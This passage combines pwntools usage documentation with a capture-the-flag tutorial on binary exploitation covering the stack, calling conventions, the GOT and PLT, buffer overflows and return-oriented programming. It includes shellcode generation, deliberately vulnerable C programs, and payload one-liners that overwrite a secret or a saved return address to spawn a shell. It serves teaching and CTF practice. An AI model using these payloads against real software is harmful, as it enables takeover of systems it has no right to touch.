However, if you run as an unprivileged user, you may see a warning message that looks like this:

Follow the instructions listed and add ~/.local/bin to your $PATH environment variable.

Development

If you are hacking on Pwntools locally, you’ll want to do something like this:

$ git clone https://github.com/Gallopsled/pwntools
$ pip install --upgrade --editable ./pwntools

Getting Started

To get your feet wet with pwntools, let’s first go through a few examples.

When writing exploits, pwntools generally follows the “kitchen sink” approach.

>>> from pwn import *

This imports a lot of functionality into the global namespace. You can now assemble, disassemble, pack, unpack, and many other things with a single function.

A full list of everything that is imported is available on the "from pwn import *" page of the pwntools documentation.

Tutorials

A series of tutorials for Pwntools exists online, at https://github.com/Gallopsled/pwntools-tutorial#readme

Making Connections

You need to talk to the challenge binary in order to pwn it, right? pwntools makes this stupid simple with its pwnlib.tubes module.

This exposes a standard interface to talk to processes, sockets, serial ports, and all manner of things, along with some nifty helpers for common tasks. For example, remote connections via pwnlib.tubes.remote.

>>> conn = remote('ftp.ubuntu.com',21)
>>> conn.recvline() # doctest: +ELLIPSIS
b'220 ...'
>>> conn.send(b'USER anonymous\r\n')
>>> conn.recvuntil(b' ', drop=True)
b'331'
>>> conn.recvline()
b'Please specify the password.\r\n'
>>> conn.close()

It’s also easy to spin up a listener

>>> l = listen()
>>> r = remote('localhost', l.lport)
>>> c = l.wait_for_connection()
>>> r.send(b'hello')
>>> c.recv()
b'hello'

Interacting with processes is easy thanks to the pwnlib.tubes.process.

>>> sh = process('/bin/sh')
>>> sh.sendline(b'sleep 3; echo hello world;')
>>> sh.recvline(timeout=1)
b''
>>> sh.recvline(timeout=5)
b'hello world\n'
>>> sh.close()

Not only can you interact with processes programmatically, but you can actually interact with processes.

>>> sh.interactive() # doctest: +SKIP
$ whoami
user

There’s even an SSH module for when you’ve got to SSH into a box to perform a local/setuid exploit with pwnlib.tubes.ssh. You can quickly spawn processes and grab the output, or spawn a process and interact with it like a process tube.

>>> shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
>>> shell['whoami']
b'bandit0'
>>> shell.download_file('/etc/motd')
>>> sh = shell.run('sh')
>>> sh.sendline(b'sleep 3; echo hello world;') 
>>> sh.recvline(timeout=1)
b''
>>> sh.recvline(timeout=5)
b'hello world\n'
>>> shell.close()

Packing Integers

A common task for exploit-writing is converting between integers as Python sees them, and their representation as a sequence of bytes. Usually, folks resort to the built-in struct module.

pwntools makes this easier with pwnlib.util.packing. No more remembering unpacking codes, and littering your code with helper routines.

>>> import struct
>>> p32(0xdeadbeef) == struct.pack('I', 0xdeadbeef)
True
>>> leet = unhex('37130000')
>>> u32(b'abcd') == struct.unpack('I', b'abcd')[0]
True

The packing/unpacking operations are defined for many common bit-widths.

>>> u8(b'A') == 0x41
True
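For readers without pwntools at hand, the same conversions can be sketched with the standard library alone. The p32 and u32 defined below are stand-ins written for this example, not the pwntools functions; they assume little-endian byte order, which is also the pwntools default.

```python
import struct

def p32(value):
    """Pack an unsigned 32-bit integer into 4 little-endian bytes."""
    return struct.pack('<I', value)

def u32(data):
    """Unpack 4 little-endian bytes into an unsigned 32-bit integer."""
    return struct.unpack('<I', data)[0]

print(p32(0xdeadbeef))                  # b'\xef\xbe\xad\xde'
print(hex(u32(b'abcd')))                # 0x64636261
print(struct.pack('>I', 0xdeadbeef))    # b'\xde\xad\xbe\xef' (big-endian, for contrast)
```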

Setting the Target Architecture and OS

The target architecture can generally be specified as an argument to the routine that requires it.

>>> asm('nop')
b'\x90'
>>> asm('nop', arch='arm')
b'\x00\xf0 \xe3'

However, it can also be set once in the global context. The operating system, word size, and endianness can also be set here.

>>> context.arch      = 'i386'
>>> context.os        = 'linux'
>>> context.endian    = 'little'
>>> context.word_size = 32

Additionally, you can use a shorthand to set all of the values at once.

>>> asm('nop')
b'\x90'
>>> context(arch='arm', os='linux', endian='big', word_size=32)
>>> asm('nop')
b'\xe3 \xf0\x00'

Setting Logging Verbosity

You can control the verbosity of the standard pwntools logging via context.

For example, setting

>>> context.log_level = 'debug'

This will cause all of the data sent and received by a tube to be printed on the screen.

Assembly and Disassembly

Never again will you need to run some already-assembled pile of shellcode from the internet! The pwnlib.asm module is full of awesome.

>>> enhex(asm('mov eax, 0'))
'b800000000'

But if you do, it’s easy to suss out!

>>> print(disasm(unhex('6a0258cd80ebf9')))
   0:   6a 02                   push   0x2
   2:   58                      pop    eax
   3:   cd 80                   int    0x80
   5:   eb f9                   jmp    0x0

However, you shouldn’t even need to write your own shellcode most of the time! pwntools comes with the pwnlib.shellcraft module, which is loaded with useful time-saving shellcodes.

Let’s say that we want to setreuid(getuid(), getuid()) followed by duping file descriptor 4 to stdin, stdout, and stderr, and then pop a shell!

>>> enhex(asm(shellcraft.setreuid() + shellcraft.dupsh(4))) # doctest: +ELLIPSIS
'6a3158cd80...'

Misc Tools

Never write another hexdump, thanks to pwnlib.util.fiddling.

Find offsets in your buffer that cause a crash, thanks to pwnlib.cyclic.

>>> cyclic(20)
b'aaaabaaacaaadaaaeaaa'
>>> # Assume EIP = 0x62616166 (b'faab' which is pack(0x62616166))  at crash time
>>> cyclic_find(b'faab')
120

ELF Manipulation

Stop hard-coding things! Look them up at runtime with pwnlib.elf.

>>> e = ELF('/bin/cat')
>>> print(hex(e.address)) #doctest: +SKIP
0x400000
>>> print(hex(e.symbols['write'])) #doctest: +SKIP
0x401680
>>> print(hex(e.got['write'])) #doctest: +SKIP
0x60b070
>>> print(hex(e.plt['write'])) #doctest: +SKIP
0x401680

You can even patch and save the files.

>>> e = ELF('/bin/cat')
>>> e.read(e.address, 4)
b'\x7fELF'
>>> e.asm(e.address, 'ret')
>>> e.save('/tmp/quiet-cat')
>>> disasm(open('/tmp/quiet-cat','rb').read(1))
'   0:   c3                      ret'

Binary Exploitation

https://ctf101.org/binary-exploitation/overview/

Binaries, or executables, are machine code for a computer to execute. For the most part, the binaries that you will face in CTFs are Linux ELF files or the occasional Windows executable. Binary Exploitation is a broad topic within Cyber Security that really comes down to finding a vulnerability in the program and exploiting it to gain control of a shell or modify the program's functions.

Common topics addressed by Binary Exploitation or 'pwn' challenges include:

Registers
The Stack
Calling Conventions
Global Offset Table (GOT)
Buffers
- Buffer Overflow
Return Oriented Programming (ROP)
Binary Security
- No eXecute (NX)
- Address Space Layout Randomization (ASLR)
- Stack Canaries
- Relocation Read-Only (RELRO)
The Heap
- Heap Exploitation
Format String Vulnerability

Registers

A register is a location within the processor that is able to store data, much like RAM. Unlike RAM, however, accesses to registers are effectively instantaneous, whereas reads from main memory can take hundreds of CPU cycles to return.

Registers can hold any value: addresses (pointers), results from mathematical operations, characters, etc. Some registers are reserved however, meaning they have a special purpose and are not "general purpose registers" (GPRs). On x86, the only 2 reserved registers are rip and rsp which hold the address of the next instruction to execute and the address of the stack respectively.

On x86, the same register can have different-sized accesses for backward compatibility. For example, the rax register is the full 64-bit register, eax is the low 32 bits of rax, ax is the low 16 bits, al is the low 8 bits, and ah is the high 8 bits of ax (bits 8-15 of rax).
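The relationship between these views can be sketched with bit masks. The value stored in rax below is arbitrary and chosen only to make each byte recognizable.

```python
rax = 0x1122334455667788

eax = rax & 0xFFFFFFFF      # low 32 bits
ax = rax & 0xFFFF           # low 16 bits
al = rax & 0xFF             # low 8 bits
ah = (rax >> 8) & 0xFF      # bits 8-15

print(hex(eax), hex(ax), hex(al), hex(ah))
# 0x55667788 0x7788 0x88 0x77
```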

The Stack

In computer architecture, the stack is a hardware manifestation of the stack data structure (a Last In, First Out queue).

In x86, the stack is simply an area in RAM that was chosen to be the stack - there is no special hardware to store stack contents. The esp/rsp register holds the address in memory where the bottom of the stack resides (the lowest address in use, which is where the most recently pushed value is stored). When something is pushed to the stack, esp decrements by 4 (or 8 on 64-bit x86), and the value that was pushed is stored at that location in memory. Likewise, when a pop instruction is executed, the value at esp is retrieved (i.e. esp is dereferenced), and esp is then incremented by 4 (or 8).

N.B. The stack "grows" down to lower memory addresses!
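The push and pop behaviour described above can be modelled in a few lines. This is a toy model for 32-bit x86 only; the class name Stack32 and the starting address are assumptions made for the sketch.

```python
class Stack32:
    """Toy model of a 32-bit x86 stack: a dict of memory plus an esp value."""

    def __init__(self, esp=0xffff0004):
        self.esp = esp
        self.memory = {}    # address -> 32-bit value

    def push(self, value):
        self.esp -= 4                               # the stack grows down
        self.memory[self.esp] = value & 0xFFFFFFFF

    def pop(self):
        value = self.memory[self.esp]               # dereference esp
        self.esp += 4
        return value

s = Stack32()
s.push(0x0804845a)
s.push(0xffff002c)
print(hex(s.esp))     # 0xfffefffc
print(hex(s.pop()))   # 0xffff002c
print(hex(s.esp))     # 0xffff0000
```

Note that pop does not erase the old value from memory; it only moves esp.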

Conventionally, ebp/rbp contains the address of the top of the current stack frame, and so sometimes local variables are referenced as an offset relative to ebp rather than an offset to esp. A stack frame is essentially just the space used on the stack by a given function.

Uses

The stack is primarily used for a few things:

Storing function arguments
Storing local variables
Storing processor state between function calls

Example

Let's see what the stack looks like right after say_hi has been called in this 32-bit x86 C program:

#include <stdio.h>

void say_hi(const char * name) {
    printf("Hello %s!\n", name);
}

int main(int argc, char ** argv) {
    char * name;
    if (argc != 2) {
        return 1;
    }
    name = argv[1];
    say_hi(name);
    return 0;
}

And the relevant assembly:

0804840b <say_hi>:
 804840b:   55                      push   ebp
 804840c:   89 e5                   mov    ebp,esp
 804840e:   83 ec 08                sub    esp,0x8
 8048411:   83 ec 08                sub    esp,0x8
 8048414:   ff 75 08                push   DWORD PTR [ebp+0x8]
 8048417:   68 f0 84 04 08          push   0x80484f0
 804841c:   e8 bf fe ff ff          call   80482e0 <printf@plt>
 8048421:   83 c4 10                add    esp,0x10
 8048424:   90                      nop
 8048425:   c9                      leave
 8048426:   c3                      ret

08048427 <main>:
 8048427:   8d 4c 24 04             lea    ecx,[esp+0x4]
 804842b:   83 e4 f0                and    esp,0xfffffff0
 804842e:   ff 71 fc                push   DWORD PTR [ecx-0x4]
 8048431:   55                      push   ebp
 8048432:   89 e5                   mov    ebp,esp
 8048434:   51                      push   ecx
 8048435:   83 ec 14                sub    esp,0x14
 8048438:   89 c8                   mov    eax,ecx
 804843a:   83 38 02                cmp    DWORD PTR [eax],0x2
 804843d:   74 07                   je     8048446 <main+0x1f>
 804843f:   b8 01 00 00 00          mov    eax,0x1
 8048444:   eb 1c                   jmp    8048462 <main+0x3b>
 8048446:   8b 40 04                mov    eax,DWORD PTR [eax+0x4]
 8048449:   8b 40 04                mov    eax,DWORD PTR [eax+0x4]
 804844c:   89 45 f4                mov    DWORD PTR [ebp-0xc],eax
 804844f:   83 ec 0c                sub    esp,0xc
 8048452:   ff 75 f4                push   DWORD PTR [ebp-0xc]
 8048455:   e8 b1 ff ff ff          call   804840b <say_hi>
 804845a:   83 c4 10                add    esp,0x10
 804845d:   b8 00 00 00 00          mov    eax,0x0
 8048462:   8b 4d fc                mov    ecx,DWORD PTR [ebp-0x4]
 8048465:   c9                      leave
 8048466:   8d 61 fc                lea    esp,[ecx-0x4]
 8048469:   c3                      ret

Skipping over the bulk of main, you'll see that at 0x8048452 main's name local is pushed to the stack because it's the first argument to say_hi. Then, a call instruction is executed. call instructions first push the current instruction pointer to the stack, then jump to their destination. So when the processor begins executing say_hi at 0x0804840b, the stack looks like this:

EIP = 0x0804840b (push ebp)
ESP = 0xffff0000
EBP = 0xffff002c

        0xffff0004: 0xffffa0a0              // say_hi argument 1
ESP ->  0xffff0000: 0x0804845a              // Return address for say_hi

The first thing say_hi does is save the current ebp so that when it returns, ebp is back where main expects it to be. The stack now looks like this:

EIP = 0x0804840c (mov ebp, esp)
ESP = 0xfffefffc
EBP = 0xffff002c

        0xffff0004: 0xffffa0a0              // say_hi argument 1
        0xffff0000: 0x0804845a              // Return address for say_hi
ESP ->  0xfffefffc: 0xffff002c              // Saved EBP

Again, note how esp gets smaller when values are pushed to the stack.

Next, the current esp is saved into ebp, marking the top of the new stack frame.

EIP = 0x0804840e (sub esp, 0x8)
ESP = 0xfffefffc
EBP = 0xfffefffc

            0xffff0004: 0xffffa0a0              // say_hi argument 1
            0xffff0000: 0x0804845a              // Return address for say_hi
ESP, EBP -> 0xfffefffc: 0xffff002c              // Saved EBP

Then, the stack is "grown" to accommodate local variables inside say_hi.

EIP = 0x08048414 (push [ebp + 0x8])
ESP = 0xfffeffec
EBP = 0xfffefffc

        0xffff0004: 0xffffa0a0              // say_hi argument 1
        0xffff0000: 0x0804845a              // Return address for say_hi
EBP ->  0xfffefffc: 0xffff002c              // Saved EBP
        0xfffefff8: UNDEFINED
        0xfffefff4: UNDEFINED
        0xfffefff0: UNDEFINED
ESP ->  0xfffeffec: UNDEFINED

NOTE: stack space is not implicitly cleared!

Now, the 2 arguments to printf are pushed in reverse order.

EIP = 0x0804841c (call printf@plt)
ESP = 0xfffeffe4
EBP = 0xfffefffc

        0xffff0004: 0xffffa0a0              // say_hi argument 1
        0xffff0000: 0x0804845a              // Return address for say_hi
EBP ->  0xfffefffc: 0xffff002c              // Saved EBP
        0xfffefff8: UNDEFINED
        0xfffefff4: UNDEFINED
        0xfffefff0: UNDEFINED
        0xfffeffec: UNDEFINED
        0xfffeffe8: 0xffffa0a0              // printf argument 2
ESP ->  0xfffeffe4: 0x080484f0              // printf argument 1

Finally, printf is called, which pushes the address of the next instruction to execute.

EIP = 0x080482e0
ESP = 0xfffeffe0
EBP = 0xfffefffc

        0xffff0004: 0xffffa0a0              // say_hi argument 1
        0xffff0000: 0x0804845a              // Return address for say_hi
EBP ->  0xfffefffc: 0xffff002c              // Saved EBP
        0xfffefff8: UNDEFINED
        0xfffefff4: UNDEFINED
        0xfffefff0: UNDEFINED
        0xfffeffec: UNDEFINED
        0xfffeffe8: 0xffffa0a0              // printf argument 2
        0xfffeffe4: 0x080484f0              // printf argument 1
ESP ->  0xfffeffe0: 0x08048421              // Return address for printf

Once printf has returned, the leave instruction moves ebp into esp, and pops the saved EBP.

EIP = 0x08048426 (ret)
ESP = 0xffff0000
EBP = 0xffff002c

        0xffff0004: 0xffffa0a0              // say_hi argument 1
ESP ->  0xffff0000: 0x0804845a              // Return address for say_hi

And finally, ret pops the saved instruction pointer into eip which causes the program to return to main with the same esp, ebp, and stack contents as when say_hi was initially called.

EIP = 0x0804845a (add esp, 0x10)
ESP = 0xffff0004
EBP = 0xffff002c

ESP ->  0xffff0004: 0xffffa0a0              // say_hi argument 1
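The esp and ebp values in this walkthrough can be recomputed with a small tracer. This is only a sketch: it tracks the two registers and ignores memory contents, and the operation names are labels invented for the example rather than a real instruction decoder.

```python
def trace(esp, ebp, program):
    """Apply each (op, arg) step and return a list of (op, esp, ebp) snapshots."""
    saved_ebp = []
    snapshots = []
    for op, arg in program:
        if op in ('push', 'call'):
            esp -= 4                    # both store one 4-byte value
        elif op == 'push ebp':
            esp -= 4
            saved_ebp.append(ebp)
        elif op == 'mov ebp,esp':
            ebp = esp
        elif op == 'sub esp':
            esp -= arg
        elif op == 'add esp':
            esp += arg
        elif op == 'leave':
            esp = ebp + 4               # mov esp,ebp followed by pop ebp
            ebp = saved_ebp.pop()
        elif op == 'ret':
            esp += 4                    # pops the return address
        snapshots.append((op, esp, ebp))
    return snapshots

program = [
    ('call', 'say_hi'), ('push ebp', None), ('mov ebp,esp', None),
    ('sub esp', 8), ('sub esp', 8), ('push', 'name'), ('push', 'format string'),
    ('call', 'printf'), ('ret', 'from printf'), ('add esp', 0x10),
    ('leave', None), ('ret', 'from say_hi'),
]
snapshots = trace(0xffff0004, 0xffff002c, program)
for op, esp, ebp in snapshots:
    print(f'{op:<12} esp={esp:#010x} ebp={ebp:#010x}')
```

The last snapshot has esp back at 0xffff0004 and ebp at 0xffff002c, the values main had just before the call.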

Calling Conventions

To be able to call functions, there needs to be an agreed-upon way to pass arguments. If a program is entirely self-contained in a binary, the compiler would be free to decide the calling convention. However, in reality, shared libraries are used so that common code (e.g. libc) can be stored once and dynamically linked into programs that need it, reducing program size.

In Linux binaries, there are really only two commonly used calling conventions: cdecl for 32-bit binaries, and SysV for 64-bit binaries.

cdecl

In 32-bit binaries on Linux, function arguments are passed in on the stack in reverse order. A function like this:

int add(int a, int b, int c) {
    return a + b + c;
}

would be invoked by pushing c, then b, then a.

SysV

For 64-bit binaries, integer and pointer function arguments are first passed in certain registers:

RDI
RSI
RDX
RCX
R8
R9

then any leftover arguments are pushed onto the stack in reverse order, as in cdecl.
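As a rough sketch of the rule, the function below decides where each argument of a call would go. It assumes only integer or pointer arguments, for which the System V AMD64 ABI uses rdi, rsi, rdx, rcx, r8 and r9 in that order; the helper name place_args is made up.

```python
SYSV_INT_ARG_REGS = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9']

def place_args(args):
    """Return (registers, push_order) for a list of integer/pointer arguments."""
    registers = dict(zip(SYSV_INT_ARG_REGS, args))
    leftover = list(args[len(SYSV_INT_ARG_REGS):])
    # Leftover arguments are pushed last-to-first, as in cdecl.
    push_order = leftover[::-1]
    return registers, push_order

regs, pushes = place_args([1, 2, 3, 4, 5, 6, 7, 8])
print(regs)     # {'rdi': 1, 'rsi': 2, 'rdx': 3, 'rcx': 4, 'r8': 5, 'r9': 6}
print(pushes)   # [8, 7]
```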

Other Conventions

Any method of passing arguments could be used as long as the compiler is aware of what the convention is. As a result, there have been many calling conventions in the past that aren't used frequently anymore. See Wikipedia for a comprehensive list.

GOT

The Global Offset Table (or GOT) is a section inside of programs that holds addresses of functions that are dynamically linked. As mentioned in the page on calling conventions, most programs don't include every function they use to reduce binary size. Instead, common functions (like those in libc) are "linked" into the program so they can be saved once on disk and reused by every program.

Unless a program is marked full RELRO, the resolution of the function to address in a dynamic library is done lazily. All dynamic libraries are loaded into memory along with the main program at launch, however, functions are not mapped to their actual code until they're first called. For example, in the following C snippet puts won't be resolved to an address in libc until after it has been called once:

int main() {
    puts("Hi there!");
    puts("Ok bye now.");
    return 0;
}

To avoid searching through shared libraries each time a function is called, the result of the lookup is saved into the GOT so future function calls "short circuit" straight to their implementation bypassing the dynamic resolver.

This has two important implications:

The GOT contains pointers to libraries which move around due to ASLR
The GOT is writable

These two facts will become very useful in Return Oriented Programming.

PLT

Before the address of a function has been resolved, the GOT points to an entry in the Procedure Linkage Table (PLT). This is a small "stub" function that is responsible for calling the dynamic linker with (effectively) the name of the function that should be resolved.
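The lazy lookup can be imitated in Python to make the control flow concrete. Everything here is a simplified model: LIBC is a stand-in dictionary for a shared library, and the class and attribute names are invented for the sketch.

```python
# Stand-in for a shared library: name -> implementation
LIBC = {'puts': lambda s: 'libc puts: ' + s}

class Program:
    def __init__(self, imports):
        self.resolver_calls = 0
        # Before resolution, every GOT slot points at a stub that asks the resolver.
        self.got = {name: self._make_stub(name) for name in imports}

    def _make_stub(self, name):
        def stub(*args):
            self.resolver_calls += 1
            self.got[name] = LIBC[name]     # patch the slot: the GOT is writable
            return self.got[name](*args)
        return stub

    def call(self, name, *args):
        return self.got[name](*args)        # every call goes through the GOT

prog = Program(['puts'])
print(prog.call('puts', 'Hi there!'))
print(prog.call('puts', 'Ok bye now.'))
print(prog.resolver_calls)   # 1: only the first call needed the resolver
```

The same writability that lets the resolver patch a slot is what lets an attacker redirect a function by overwriting its GOT entry.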

Buffers

A buffer is any allocated space in memory where data (often user input) can be stored. For example, in the following C program name would be considered a stack buffer:

#include <stdio.h>
#include <unistd.h>

int main() {
    char name[64] = {0};
    read(0, name, 63);
    printf("Hello %s", name);
    return 0;
}

Buffers could also be global variables:

#include <stdio.h>
#include <unistd.h>

char name[64] = {0};

int main() {
    read(0, name, 63);
    printf("Hello %s", name);
    return 0;
}

Or dynamically allocated on the heap:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main() {
    char *name = malloc(64);
    memset(name, 0, 64);
    read(0, name, 63);
    printf("Hello %s", name);
    return 0;
}

Exploits

Given that buffers commonly hold user input, mistakes when writing to them could result in attacker-controlled data being written outside of the buffer's space. See the page on buffer overflows for more.

Buffer Overflow

A Buffer Overflow is a vulnerability in which data can be written that exceeds the allocated space, allowing an attacker to overwrite other data.

Stack buffer overflow

The simplest and most common buffer overflow is one where the buffer is on the stack. Let's look at an example.

#include <stdio.h>
#include <unistd.h>

int main() {
    int secret = 0xdeadbeef;
    char name[100] = {0};
    read(0, name, 0x100);
    if (secret == 0x1337) {
        puts("Wow! Here's a secret.");
    } else {
        puts("I guess you're not cool enough to see my secret");
    }
}

There's a tiny mistake in this program which will allow us to see the secret. name is decimal 100 bytes, however, we're reading in hex 100 bytes (=256 decimal bytes)! Let's see how we can use this to our advantage.

If the compiler chose to lay out the stack like this:

        0xffff006c: 0xf7f7f7f7  // Saved EIP
        0xffff0068: 0xffff0100  // Saved EBP
        0xffff0064: 0xdeadbeef  // secret
...
        0xffff0004: 0x0
ESP ->  0xffff0000: 0x0         // name

let's look at what happens when we read in 0x100 bytes of 'A's.

The first decimal 100 bytes are saved properly:

        0xffff006c: 0xf7f7f7f7  // Saved EIP
        0xffff0068: 0xffff0100  // Saved EBP
        0xffff0064: 0xdeadbeef  // secret
...
        0xffff0004: 0x41414141
ESP ->  0xffff0000: 0x41414141  // name

However, when the 101st byte is read in, we see an issue:

        0xffff006c: 0xf7f7f7f7  // Saved EIP
        0xffff0068: 0xffff0100  // Saved EBP
        0xffff0064: 0xdeadbe41  // secret
...
        0xffff0004: 0x41414141
ESP ->  0xffff0000: 0x41414141  // name

The least significant byte of the secret has been overwritten! If we follow the next 3 bytes to be read in, we'll see the entirety of the secret is "clobbered" with our 'A's

        0xffff006c: 0xf7f7f7f7  // Saved EIP
        0xffff0068: 0xffff0100  // Saved EBP
        0xffff0064: 0x41414141  // secret
...
        0xffff0004: 0x41414141
ESP ->  0xffff0000: 0x41414141  // name

The remaining 152 bytes would continue clobbering values up the stack.
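The clobbering can be reproduced with a byte-level model of this stack layout. It is a sketch under the same assumption as the diagrams (secret sits directly above name), and it only models the 112 bytes shown, so input beyond that is ignored here even though a real read would keep writing.

```python
import struct

NAME_SIZE = 100

def simulate_read(data):
    """Copy data over a model of the frame and return (secret, saved_ebp, saved_eip)."""
    # name (100 zero bytes), then secret, saved EBP and saved EIP as little-endian words
    frame = bytearray(NAME_SIZE) + struct.pack('<III', 0xdeadbeef, 0xffff0100, 0xf7f7f7f7)
    n = min(len(data), 0x100, len(frame))
    frame[:n] = data[:n]
    return struct.unpack_from('<III', frame, NAME_SIZE)

print(hex(simulate_read(b'A' * 100)[0]))   # 0xdeadbeef
print(hex(simulate_read(b'A' * 101)[0]))   # 0xdeadbe41
print(hex(simulate_read(b'A' * 104)[0]))   # 0x41414141
```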

Passing an impossible check

How can we use this to pass the seemingly impossible check in the original program? Well, if we carefully line up our input so that the bytes that overwrite the secret happen to be the bytes that represent 0x1337 in Little Endian, we'll see the secret message.

A small Python 2 one-liner will work nicely: python -c "print 'A'*100 + '\x37\x13\x00\x00'"

This will fill the name buffer with 100 'A's, then overwrite the secret with the 32-bit little-endian encoding of 0x1337.
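In Python 3 the payload is better built as bytes, since print works on text. A minimal sketch, with the function name build_secret_payload made up for illustration:

```python
import struct

def build_secret_payload():
    """100 bytes of padding followed by 0x1337 as a 32-bit little-endian value."""
    return b'A' * 100 + struct.pack('<I', 0x1337)

payload = build_secret_payload()
print(len(payload))     # 104
print(payload[-8:])     # b'AAAA7\x13\x00\x00' (0x37 is the ASCII character '7')

# To feed the raw bytes to a program, write them with
# sys.stdout.buffer.write(payload) rather than print(payload).
```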

Going one step further

As discussed on the stack page, the instruction that the current function should jump to when it is done is also saved on the stack (denoted as "Saved EIP" in the above stack diagrams). If we can overwrite this, we can control where the program jumps after main finishes running, giving us the ability to control what the program does entirely.

Usually, the end objective in binary exploitation is to get a shell (often called "popping a shell") on the remote computer. The shell provides us with an easy way to run anything we want on the target computer.

Say there happens to be a convenient function that does this, defined somewhere else in the program, that we normally can't reach:

void give_shell() {
    system("/bin/sh");
}

Well, with our buffer overflow knowledge, now we can! All we have to do is overwrite the saved EIP on the stack with the address of give_shell. Then, when main returns, it will pop that address off the stack and jump to it, running give_shell and giving us our shell.

Assuming give_shell is at 0x08048fd0, we could use something like this (Python 2 syntax): python2 -c "print 'A'*108 + '\xd0\x8f\x04\x08'"

We send 108 'A's to overwrite the 100 bytes that are allocated for the name, the 4 bytes for secret, and the 4 bytes for the saved EBP. Then we simply send the little-endian form of give_shell's address, and we would get a shell!
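The padding length follows directly from the frame layout, so it can be computed rather than counted by hand. The sketch below assumes the layout from the stack diagrams and the assumed give_shell address from the text. On a real binary the compiler may add padding, so the offset should be confirmed in a debugger.

```python
import struct

# Fields between the start of name and the saved EIP, per the diagrams.
layout = [("name", 100), ("secret", 4), ("saved EBP", 4)]
GIVE_SHELL = 0x08048fd0   # assumed address, as in the text

padding = sum(size for _, size in layout)            # bytes before the saved EIP
payload = b"A" * padding + struct.pack("<I", GIVE_SHELL)

print(padding, payload[padding:].hex())
```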

This idea is extended in Return Oriented Programming.

Return Oriented Programming

Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.

As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwrite saved instruction pointers, giving us control over what the program does next. Most programs don't have a convenient give_shell function, however, so we need to find a way to manually invoke system or another exec function to get our shell.

32 bit

Imagine we have a program similar to the following:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char name[32];

int main() {
    printf("What's your name? ");
    read(0, name, 32);

    printf("Hi %s\n", name);

    printf("The time is currently ");
    system("/bin/date");

    char echo[100];
    printf("What do you want me to echo back? ");
    read(0, echo, 1000);
    puts(echo);

    return 0;
}

We obviously have a stack buffer overflow on the echo variable, which can give us EIP control when main returns. But we don't have a give_shell function! So what can we do?

We can call system with an argument we control! Since arguments are passed in on the stack in 32-bit Linux programs (see calling conventions), if we have stack control, we have argument control.

When main returns, we want the stack to look as if system had just been called normally. Recall what is on the stack after a function has been called:

        ...                                 // More arguments
        0xffff0008: 0x00000002              // Argument 2
        0xffff0004: 0x00000001              // Argument 1
ESP ->  0xffff0000: 0x080484d0              // Return address

So at the moment main returns, the top of the stack needs to look like this:

        0xffff0008: 0xdeadbeef              // system argument 1
        0xffff0004: 0xdeadbeef              // return address for system
ESP ->  0xffff0000: 0x08048450              // return address for main (system's PLT entry)

Then, when main returns, it will jump into system's PLT entry, and the stack will look just as if system had been called normally.

Note: we don't care about the address system will return to, because we will already have our shell by then!

Arguments

This is a good start, but we need to pass an argument to system for anything to happen. As mentioned in the page on ASLR, the stack and dynamic libraries "move around" each time a program is run, which means we can't easily use data on the stack or a string in libc for our argument. In this case, however, we have a very convenient name global, which will be at a known location in the binary (in the BSS segment).

Putting it together

Our exploit will need to do the following:

Enter "sh" or another command to run as the name
Fill the stack with
1. Garbage up to the saved EIP
2. The address of system's PLT entry
3. A fake return address for system to jump to when it's done
4. The address of the name global, which acts as the first argument to system
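The steps above can be sketched as two inputs built in Python. Only the system PLT address comes from the diagram above. NAME_ADDR and OFFSET are hypothetical placeholders that would have to be read from the actual binary (for example with a disassembler and a debugger), and p32 is a small helper defined here.

```python
import struct

def p32(value):
    """Pack a 32-bit value in little-endian order."""
    return struct.pack("<I", value)

SYSTEM_PLT = 0x08048450   # system's PLT entry, as in the diagram above
NAME_ADDR = 0x0804a060    # hypothetical address of the name global
OFFSET = 112              # hypothetical distance from echo to the saved EIP

# First read(): the command string that ends up in the name global.
first_input = b"sh\x00"

# Second read(): overflow echo and lay out the fake call to system.
second_input = (
    b"A" * OFFSET         # 1. garbage up to the saved EIP
    + p32(SYSTEM_PLT)     # 2. main "returns" into system's PLT entry
    + p32(0xdeadbeef)     # 3. fake return address for system
    + p32(NAME_ADDR)      # 4. first argument: pointer to the command string
)

print(second_input[OFFSET:].hex())
```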

64 bit

In 64-bit binaries, we have to work a bit harder to pass arguments to functions. The basic idea of overwriting the saved RIP is the same, but as discussed in calling conventions, arguments are passed in registers in 64-bit programs. In the case of calling system, this means we will need to find a way to control the RDI register.

To do this, we'll use small snippets of assembly in the binary, called "gadgets." These gadgets usually pop one or more registers off of the stack and then execute ret, which allows us to chain them together by building a large fake call stack.

For example, if we needed control of both RDI and RSI, we might find two gadgets in our program that look like this (using a tool like rp++ or ROPgadget):

0x400c01: pop rdi; ret
0x400c03: pop rsi; pop r15; ret

We can set up a fake call stack with these gadgets to execute them in sequence, popping values we control into registers, and then end with a jump to system.

Example

        0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
        0xffff0020: 0x1337beef          // value we want in r15 (probably garbage)
        0xffff0018: 0x1337beef          // value we want in rsi
        0xffff0010: 0x400c03            // address that the rdi gadget's ret will return to - the pop rsi gadget
        0xffff0008: 0xdeadbeef          // value to be popped into rdi
RSP ->  0xffff0000: 0x400c01            // address of rdi gadget

Stepping through this one instruction at a time, main returns, jumping to our pop rdi gadget:

RIP = 0x400c01 (pop rdi)
RDI = UNKNOWN
RSI = UNKNOWN

        0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
        0xffff0020: 0x1337beef          // value we want in r15 (probably garbage)
        0xffff0018: 0x1337beef          // value we want in rsi
        0xffff0010: 0x400c03            // address that the rdi gadget's ret will return to - the pop rsi gadget
RSP ->  0xffff0008: 0xdeadbeef          // value to be popped into rdi

pop rdi is then executed, popping the top of the stack into RDI:

RIP = 0x400c02 (ret)
RDI = 0xdeadbeef
RSI = UNKNOWN

        0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
        0xffff0020: 0x1337beef          // value we want in r15 (probably garbage)
        0xffff0018: 0x1337beef          // value we want in rsi
RSP ->  0xffff0010: 0x400c03            // address that the rdi gadget's ret will return to - the pop rsi gadget

The RDI gadget then rets into our RSI gadget:

RIP = 0x400c03 (pop rsi)
RDI = 0xdeadbeef
RSI = UNKNOWN

